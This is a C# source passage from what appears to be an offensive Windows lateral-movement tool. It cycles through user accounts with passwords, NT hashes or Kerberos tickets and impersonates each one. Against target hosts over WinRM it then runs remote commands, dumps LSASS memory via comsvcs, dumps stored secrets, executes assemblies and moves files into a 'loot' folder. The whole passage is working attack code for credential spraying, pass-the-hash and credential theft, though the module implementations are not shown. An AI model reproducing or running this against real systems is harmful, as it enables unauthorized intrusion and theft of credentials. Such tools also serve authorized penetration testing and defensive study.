public static void WINRM(string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags)
{
foreach (string computername in computernames)
{
try
{
Console.WriteLine(String.Format("[*] Checking {0}", computername));
if (!Misc.CheckHostPort(computername, 5985))
{
Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
Console.WriteLine();
continue;
}
if (module.Length == 0 || module.Contains("exec"))
{
Wsman.CheckLocalAdmin(computername, moduleargument, flags);
}
else if (module.Contains("comsvcs"))
{
Wsman.InvokeComSvcsLsassDump(computername);
}
else if (module.Contains("secrets") || module.Contains("secret"))
{
Wsman.GetSecrets(computername);
}
else if (module.Contains("assembly"))
{
Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
}
else if (module.Contains("download"))
{
Wsman.CopyFile(computername, path, destination);
}
else if (module.Contains("upload"))
{
Wsman.UploadFile(computername, path, destination);
}
Console.WriteLine("");
}
catch (Exception e)
{
Console.WriteLine("[-] {0}:5985 - {1}", computername, e.ToString());
}
}
}
public static void StartJob <T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags)
{
string[] passwords;
if (typeof(T) == typeof(NTHash))
{
passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Nthash").GetValue(secrets, null);
foreach (string user in users)
{
foreach (string password in passwords)
{
Console.WriteLine("------------------");
Console.WriteLine(string.Format("[*] User: {0}", user));
Console.WriteLine(string.Format("[*] domain: {0}", domain));
Console.WriteLine(string.Format("[*] secret: {0}", password));
Console.WriteLine();
SetThreadToken(user, domain, password);
foreach (string computername in computernames)
{
Console.WriteLine(String.Format("[*] Checking {0}", computername));
if (!Misc.CheckHostPort(computername, 5985))
{
Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
Console.WriteLine();
continue;
}
if (!Directory.Exists(Path.Combine("loot", computername)))
{
Directory.CreateDirectory(Path.Combine("loot", computername));
}
if (module.Length == 0 || module.Contains("exec"))
{
Wsman.CheckLocalAdmin(computername, moduleargument, flags);
}
else if (module.Contains("comsvcs"))
{
Wsman.InvokeComSvcsLsassDump(computername);
}
else if (module.Contains("secrets") || module.Contains("secret"))
{
Wsman.GetSecrets(computername);
}
else if (module.Contains("assembly"))
{
Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
}
else if (module.Contains("download"))
{
Wsman.CopyFile(computername, path, destination);
}
Console.WriteLine("");
}
}
}
}
else if (typeof(T) == typeof(ClearText))
{
passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Cleartext").GetValue(secrets, null);
foreach (string user in users)
{
foreach (string password in passwords)
{
Console.WriteLine("------------------");
Console.WriteLine(string.Format("[*] User: {0}", user));
Console.WriteLine(string.Format("[*] domain: {0}", domain));
Console.WriteLine(string.Format("[*] secret: {0}", password));
Console.WriteLine();
using (new Impersonator.Impersonation(domain, user, password))
{
foreach (string computername in computernames)
{
Console.WriteLine(String.Format("[*] Checking {0}", computername));
if (!Misc.CheckHostPort(computername, 5985))
{
Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
Console.WriteLine();
continue;
}
if (!Directory.Exists(Path.Combine("loot", computername)))
{
Directory.CreateDirectory(Path.Combine("loot", computername));
}
if (module.Length == 0 || module.Contains("exec"))
{
Wsman.CheckLocalAdmin(computername, moduleargument, flags);
}
else if (module.Contains("comsvcs"))
{
Wsman.InvokeComSvcsLsassDump(computername);
}
else if (module.Contains("secrets") || module.Contains("secret"))
{
Wsman.GetSecrets(computername);
}
else if (module.Contains("assembly"))
{
Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
}
else if (module.Contains("download"))
{
Wsman.CopyFile(computername, path, destination);
}
Console.WriteLine("");
}
}
}
}
}
}
public static void StartJob(string[] users, string domain, string[] passwords, string[] hashes, string ticket, KERB_ETYPE encType, string dc, string[] computernames, string module, string moduleargument, string path, string destination, List <string> flags)
{
AToken.MakeToken("Fake", "Fake", "Fake");
string ticketoutput;
if (String.IsNullOrEmpty(ticket))
{
foreach (string user in users)
{
var secrets = hashes.Length > 0 ? hashes : passwords;
foreach (string secret in secrets)
{
string hash;
if (passwords.Length > 0)
{
string salt = String.Format("{0}{1}", domain.ToUpper(), user);
hash = Crypto.KerberosPasswordHash(encType, secret, salt);
}
else
{
hash = secret;
}
Console.WriteLine("------------------");
Console.WriteLine(string.Format("[*] User: {0}", user));
Console.WriteLine(string.Format("[*] domain: {0}", domain));
Console.WriteLine(string.Format("[*] secret: {0}", secret));
ticketoutput = SecurityContext.AskTicket(user, domain, hash, encType, dc);
if (ticketoutput.Contains("[+] Ticket successfully imported!"))
{
Console.WriteLine("[+] Ticket successfully imported!");
}
else
{
Console.WriteLine("[-] Could not request TGT");
continue;
}
//ticket debugging
//List<LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(false, new LUID(), "", "", "", true);
//LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Klist);
Console.WriteLine();
foreach (string computername in computernames)
{
Console.WriteLine(String.Format("[*] Checking {0}", computername));
if (!Misc.CheckHostPort(computername, 5985))
{
Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
Console.WriteLine();
continue;
}
if (!Directory.Exists(Path.Combine("loot", computername)))
{
Directory.CreateDirectory(Path.Combine("loot", computername));
}
if (module.Length == 0 || module.Contains("exec"))
{
Wsman.CheckLocalAdmin(computername, moduleargument, flags);
}
else if (module.Contains("comsvcs"))
{
Wsman.InvokeComSvcsLsassDump(computername);
}
else if (module.Contains("secrets") || module.Contains("secret"))
{
Wsman.GetSecrets(computername);
}
else if (module.Contains("assembly"))
{
Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
}
else if (module.Contains("download"))
{
Wsman.CopyFile(computername, path, destination);
}
else if (module.Contains("upload"))
{
Wsman.UploadFile(computername, path, destination);
}
Console.WriteLine("");
}
}
}
}
else
{
Console.WriteLine("------------------");
Console.WriteLine(string.Format("[*] Ticket: {0}", ticket));
ticketoutput = SecurityContext.ImportTicket(ticket);
if (ticketoutput.Contains("[+] Ticket successfully imported!"))
{
Console.WriteLine("[+] TGT imported successfully!");
}
else
{
Console.WriteLine("[-] Could not import TGT");
return;
}
//ticket debugging
//List<LSA.SESSION_CRED> sessionCreds = LSA.EnumerateTickets(false, new LUID(), "", "", "", true);
//LSA.DisplaySessionCreds(sessionCreds, LSA.TicketDisplayFormat.Klist);
Console.WriteLine();
foreach (string computername in computernames)
{
Console.WriteLine(String.Format("[*] Checking {0}", computername));
if (!Misc.CheckHostPort(computername, 5985))
{
Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername, flags));
Console.WriteLine();
continue;
}
if (!Directory.Exists(Path.Combine("loot", computername)))
{
Directory.CreateDirectory(Path.Combine("loot", computername));
}
if (module.Length == 0 || module.Contains("exec"))
{
Wsman.CheckLocalAdmin(computername, moduleargument, flags);
}
else if (module.Contains("comsvcs"))
{
Wsman.InvokeComSvcsLsassDump(computername);
}
else if (module.Contains("secrets") || module.Contains("secret"))
{
Wsman.GetSecrets(computername);
}
else if (module.Contains("assembly"))
{
Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
}
else if (module.Contains("download"))
{
Wsman.CopyFile(computername, path, destination);
}
else if (module.Contains("upload"))
{
Wsman.UploadFile(computername, path, destination);
}
Console.WriteLine("");
}
}
AToken.RevertFromToken();
}